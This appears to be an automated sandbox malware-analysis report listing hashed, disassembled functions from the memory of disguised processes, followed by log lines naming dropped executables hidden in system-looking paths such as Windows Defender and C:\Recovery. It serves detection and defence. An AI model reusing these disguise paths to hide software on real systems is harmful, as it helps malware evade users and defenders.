Instruction ID: 128afa492d85d6e2342dd320b66fce3a11b148186a3000d00c723c435712eeb0
Opcode Fuzzy Hash: 862da456ab318e7007a7b6c8fab8f83fa113c411c35f857156df9146cbc3536b
Instruction Fuzzy Hash: DEF06D3081E64E8FEB85EF6494192FA77A4FF15389F50047AF80DC21D1DB39A5A0CB98

Function 00007FF848F32779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6dac96756336d37693f7394d2322a2f0a566dbb2b0a0501b559b8a94ffd1e3
Instruction ID: 5f1a89e8838b99a2d585de98c044f195e54d654c153dc9a6e7536866b176e20b
Opcode Fuzzy Hash: df6dac96756336d37693f7394d2322a2f0a566dbb2b0a0501b559b8a94ffd1e3
Instruction Fuzzy Hash: B0F0623180E78A8FEB5AAF7488592B97BA1FF56342F4504BBD409C61D2DB38A454C741

Function 00007FF848F30FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5b21bf0dd4b628541e5db263539b9b0d3310f83c61fa67d30e46ae70b31779
Instruction ID: 7070dea7c09da579a71c803cc32a33f27d0c8acbfc8133e622d2d13eaf21bdfa
Opcode Fuzzy Hash: 3c5b21bf0dd4b628541e5db263539b9b0d3310f83c61fa67d30e46ae70b31779
Instruction Fuzzy Hash: A801E830D096198FEB50FB54C8447EDB7F0EB54341F1042AAD809E7292DF386A84CF58

Function 00007FF848F412D0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa93bd4738985e2facfd8cabf7746a5f72ea4df5e5eee02c4c63536f1e9b3932
Instruction ID: a0f5206afdf97a4317decf32c33fe28ed118a5578831b507d87bee89bdda4dfc
Opcode Fuzzy Hash: fa93bd4738985e2facfd8cabf7746a5f72ea4df5e5eee02c4c63536f1e9b3932
Instruction Fuzzy Hash: 2AF0F870958A5E8EEB84EF6898582FE76E4FF28305F40053BE81DD2190EB74A694C745

Function 00007FF848F3BC41 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88e1d3b97f072c21f8b76085df359e61f8ed39fc6bd22f7da0e8665a400999c
Instruction ID: 972629ded854a2b6b01fefa9d6c46e2762af1dda78f8f1f95c9686b57a664cde
Opcode Fuzzy Hash: a88e1d3b97f072c21f8b76085df359e61f8ed39fc6bd22f7da0e8665a400999c
Instruction Fuzzy Hash: DEF0F970D1D51A8EEBA4EB188454BF973A1EB58380F5046B7C40ED2185DE38A9C18B44

Function 00007FF848F44000 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca42d5e05a5c9ea3623d23eedfa36077a708948d26483971891714cacbf21461
Instruction ID: 591e0d1b43e2a5b6029fa5594acf0d1c46420cc2ed8eb67bbe8b6bff34bc417a
Opcode Fuzzy Hash: ca42d5e05a5c9ea3623d23eedfa36077a708948d26483971891714cacbf21461
Instruction Fuzzy Hash: 94F01C3194890E9EEB90FB68D4496BA77E4FF28341F104972D40DE7196EF34E5548704

Function 00007FF848F327ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2162cfdcad1582e312cf6ecae12bd1ae6b5aba8bc7264541b0a518b7edfeacb
Instruction ID: 67cda4abcb677e50ebf01ffc3250d9bb16f60c5004b8c20f6bd2534d3bf75017
Opcode Fuzzy Hash: e2162cfdcad1582e312cf6ecae12bd1ae6b5aba8bc7264541b0a518b7edfeacb
Instruction Fuzzy Hash: 45F0BE3080E78E8FEB5AAF6488192F97BA0FF15342F4404BFE809C61E2EB399454C741

Function 00007FF848F3BD69 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5081d02be16008d4f9e1a3b5868cfa012f8ab162303ed1103e7ef76def732d06
Instruction ID: 5a147c60696bcd23bb595b0db6c0fbb476aa00df4bcf1acc9f1d0256e359e044
Opcode Fuzzy Hash: 5081d02be16008d4f9e1a3b5868cfa012f8ab162303ed1103e7ef76def732d06
Instruction Fuzzy Hash: 6CF07470D1851E8EEBA0EB68C8557ACBAB1FF48281F4085F7900DE2292DF342E808F14

Function 00007FF848F417CC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe99f658f665a66ebab8b8c04916781130e3e2007cae37154dc172f0d0900d1
Instruction ID: 042f74919c80f64a4a29a6bda6999df5c5479b9dcc715d36f9346ceeef84dc3b
Opcode Fuzzy Hash: bbe99f658f665a66ebab8b8c04916781130e3e2007cae37154dc172f0d0900d1
Instruction Fuzzy Hash: 77F03035E0D2298FCB98DF54D8946FD7765EF91350F1040BAD10DA7291CB341A98CB45

Function 00007FF848F42438 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b14dd6a62cfa414f4f93c563904a540db2201fb0653af32e3c92dd20e470fb
Instruction ID: c99d747642b2d1ad353ea819c7a97aa212f76c506615dcb317478727a7d7294d
Opcode Fuzzy Hash: e6b14dd6a62cfa414f4f93c563904a540db2201fb0653af32e3c92dd20e470fb
Instruction Fuzzy Hash: D2E0123090D505CFEB10EB94C5449EE73E1EB54752F104176D405A62C5FF796D848E98

Function 00007FF848F4580B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e39185f8e709d308ee46109949af3fc9b3c6efa3dad51b1741a978767ba488
Instruction ID: 13e5a5492f2ecda2a9901efac4f507c05af3282ea73a666af72b10d52718a914
Opcode Fuzzy Hash: 69e39185f8e709d308ee46109949af3fc9b3c6efa3dad51b1741a978767ba488
Instruction Fuzzy Hash: 41D01271C19B0A9FE744FF5C84892A8BBF1FB54B48B10016AD41DE3285DF38D4014B44

Non-executed Functions

Function 00007FF848F41609 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF848F41CAD
!, xrefs: 00007FF848F4164D
#, xrefs: 00007FF848F41C66
/, xrefs: 00007FF848F414A9

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: !$#$-$/
API String ID: 0-2869350023
Opcode ID: 993c21e9f192e3303987cd5a1c0c0440bb0d5bb1c663e4a5d00943ed1cdafc61
Instruction ID: a9beccb8ea33c93632d5ea4545a64c38acc73bcf65ba7582c21e91bf744547a6
Opcode Fuzzy Hash: 993c21e9f192e3303987cd5a1c0c0440bb0d5bb1c663e4a5d00943ed1cdafc61
Instruction Fuzzy Hash: BB31C770D0962D8FEBA8EF54C8A47E8B7B1FB69745F2041AAC40DE7291CB345A84CF44

Function 00007FF848F3F3C5 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

,, xrefs: 00007FF848F3F262
\, xrefs: 00007FF848F3F255
2, xrefs: 00007FF848F3F438
!, xrefs: 00007FF848F3F3CF

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F3F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f3f000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: !$,$2$\
API String ID: 0-4146109853
Opcode ID: 4739ec5476dfdd66db2ce10a02d9039c84baef2e70d858b583c8bbcd84a83b5a
Instruction ID: 6cee4983935ea5c8344b77f29ad3f533d2c454c0f86d8b9e6818a95e463d5be9
Opcode Fuzzy Hash: 4739ec5476dfdd66db2ce10a02d9039c84baef2e70d858b583c8bbcd84a83b5a
Instruction Fuzzy Hash: 61111CB0D0862ACFEB68EF54D8847AEB7B2EF94341F1081AAD44D62285CB785981CF55

Analysis Process: System.exePID: 7616, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 8d2533df87d014f73ab7ab62e513811da71dbc7fb7fac57b7ba45b914a16c284
Instruction ID: b995ca2d6b560f4cb65fa2274ddf85d1c713279b4e9bde37e5bcbaa2b62a1b2f
Opcode Fuzzy Hash: 8d2533df87d014f73ab7ab62e513811da71dbc7fb7fac57b7ba45b914a16c284
Instruction Fuzzy Hash: 57116A31D0D95E9EE780FB68D8492BA7BE0FFA8381F4405B6D819C61D2EF38A9448700

Function 00007FF848F1123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction ID: 59e420d3da0b8648ff7755b34c14c5f12d1bc2c2f64e90152eb5d66d88cb7bb2
Opcode Fuzzy Hash: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction Fuzzy Hash: 9B11B230D0D59E8EEB99FB6884596B97BE0FF66341F4415BAD00AC60D2EF255884C714

Function 00007FF848F11250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction ID: 3a0628975e96b354667c55ebd7b7a3e137eebbf65dd67573b3df0e1becedb54f
Opcode Fuzzy Hash: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction Fuzzy Hash: 99F0AF30E1D5AF8EEBD8BB6898183BA77E4FF56355F04153AD40DC20D2EF2818948224

Function 00007FF848F10638 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction ID: f38f12e3869879333271e81e1c1c296720e4ad5959461352f84d963cf5a24ce6
Opcode Fuzzy Hash: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction Fuzzy Hash: E481F623D0E5E28EE255777C78151F92BA0FFD27A5F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F10615 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction ID: 9ddd905e94ad51cbb1d94078663ff3c194414c1186ca9e9c652ee012418b1213
Opcode Fuzzy Hash: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction Fuzzy Hash: F581F423D0E5E29EE255777C78151F92BA0FFD27A4F0805B7D4888E0D7EE2C5C4A8299

Function 00007FF848F116D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction ID: 9d47db5b7477f55cc50459841814894283a13701d35ce8f247822db9afa3596b
Opcode Fuzzy Hash: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction Fuzzy Hash: 9881AD31A1CA4A8FDB59EF1C88656B977E2FF98740F14057AE44DC32C6CF24AC428785

Function 00007FF848F10640 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction ID: e12b4ed427cd5e5359c1e9f346300e734fbcf5dba73890fbe2218ca44a26422d
Opcode Fuzzy Hash: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction Fuzzy Hash: C071E523D0E5E28EE255777C78161F92BA0FFD27A4F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F11D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction ID: 08e05f6918b1cead9a694319facf2336c3f7316130eaf01ccf0311b7ee88575f
Opcode Fuzzy Hash: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction Fuzzy Hash: 8951CF31A1CA9A8FDB48EF1888645BA77E2FB98740F14457ED44AC7282CF34EC42C785

Function 00007FF848F13165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a3014f597aa8bd86ce1c6ef602b08bcab163ce0c1ef2d8eb1f1d89c8d888e5
Instruction ID: 778423e07f82cd6a69160b02dcfa20b26acc96a012d6542f1e61dfb7545bf3a1
Opcode Fuzzy Hash: c6a3014f597aa8bd86ce1c6ef602b08bcab163ce0c1ef2d8eb1f1d89c8d888e5
Instruction Fuzzy Hash: AC512330E0C60E8EEB94EB98C4596EDBBB1EF58341F50017AD00AE72D2DB386D458B58

Function 00007FF848F12145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894939c8785645d6930613af0afbd042860185de593675c9cbfc6f3f82531b9b
Instruction ID: 2c863f4e82287b9eec642ba98e47e2c551fa9e4acf49f97b62f500b172968417
Opcode Fuzzy Hash: 894939c8785645d6930613af0afbd042860185de593675c9cbfc6f3f82531b9b
Instruction Fuzzy Hash: 04412A31E1D68A4FE385E7B898551B9BBE0EF8A390F0505BBD44DC71D2DF28AC418355

Function 00007FF848F10805 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction ID: 9b59a2b7c48762c347dfc1bc6bc65970f1c6c7b1b9379034dcac8c24fd0defcf
Opcode Fuzzy Hash: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction Fuzzy Hash: FF21377290D6969FE345B77CA8592E97BD0FF413A8F080177D448CD083EF189456C395

Function 00007FF848F13294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f081854fe10f8cc8e6c35cf0a3e7a96493036321965206ee076a41290bdb124
Instruction ID: 94847e346af935d2b0f9367d8c8da78fa3764771662f2f608628292279487446
Opcode Fuzzy Hash: 1f081854fe10f8cc8e6c35cf0a3e7a96493036321965206ee076a41290bdb124
Instruction Fuzzy Hash: BC21EE70E0891D8FEB94EB98C494AECBBF1FB98341F10017AC00AE72D5DB396840CB18

Function 00007FF848F13354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction ID: 8716511402db7d0fe06ca6a002ee3a8397d58f55eaf4dde044fc863a827684a5
Opcode Fuzzy Hash: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction Fuzzy Hash: 0621903184D78A8FE742EB7888585E97FF4EF5B301F0905EBD089C70A2DA2D994AC751

Function 00007FF848F134E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction ID: f50d61e7886c3a414352f7edc936ab2bb4d51ac87a8a69a72ab804299b3eb8de
Opcode Fuzzy Hash: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction Fuzzy Hash: 5B113C7090868E8FDB49EB6888596BA7BA0FF18741F0408BED45AC61D1DB39A944C704

Function 00007FF848F12E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f6b7a2abc832a78aa856d2dba19983cb058a5368b19ef57a6e8f48847a2bad
Instruction ID: 4ee86a17b559eeaa6eaccf352f82223947ff89b83f188f2dde5f4ebf93f3960c
Opcode Fuzzy Hash: 45f6b7a2abc832a78aa856d2dba19983cb058a5368b19ef57a6e8f48847a2bad
Instruction Fuzzy Hash: A701783091D64E8FE751FBA888886A97BE0FF59341F0544B6D40CC70A2EB38E8948704

Function 00007FF848F1285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction ID: 9ba1ed8f581ce742fa098ab39fec836d8a793d7aa7e8cf0304d1bf967646cefb
Opcode Fuzzy Hash: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction Fuzzy Hash: EA018B3090D64E9FEB51FBA8889D6B97BE0FF59351F5544B7D408C60A2EF38E8448704

Function 00007FF848F12EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction ID: 374000839110052f1792d5a618425db3812719fb7fe10628f8c0cfa0c78bcec3
Opcode Fuzzy Hash: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction Fuzzy Hash: 4A01713191D6894FE742FBB488595A97BE0EF5A340F0604F6D408CB0E6EB38A844C715

Function 00007FF848F11CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction ID: 4e7c56c5234e285599276f46358f60bbfb0e69caefb5bd2c0d8fe49c24f8b8c0
Opcode Fuzzy Hash: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction Fuzzy Hash: 3C01813080D68E8FEB59EF2488592FA7BA0FF55341F4414BAE808C21D2DB769990C744

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction ID: 37822abbcc4d1ee92253577ba5ff98e4974758f570ad5a827b46416169419fa3
Opcode Fuzzy Hash: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction Fuzzy Hash: 8F018C30819A0E9EEB49FBA4C4582BE77A2FF18345F10087EE41EC25D1DF35A990CB04

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2203765998.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_System.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction ID: 9fd982e8349309e59296aa72dc17bc16b96aa3c6b0e6ddc1fee22b776d236d66
Opcode Fuzzy Hash: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction Fuzzy Hash: D8018C30819A0E9FEB49FBA4C4582BAB7A0FF18355F20087EE40EC21D1DF36A950C704

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Queries volume information: C:\Users\user\Desktop\4KjLUaW30K.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Recovery\System.exe	Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\Recovery\System.exe	Queries volume information: C:\Recovery\System.exe VolumeInformation
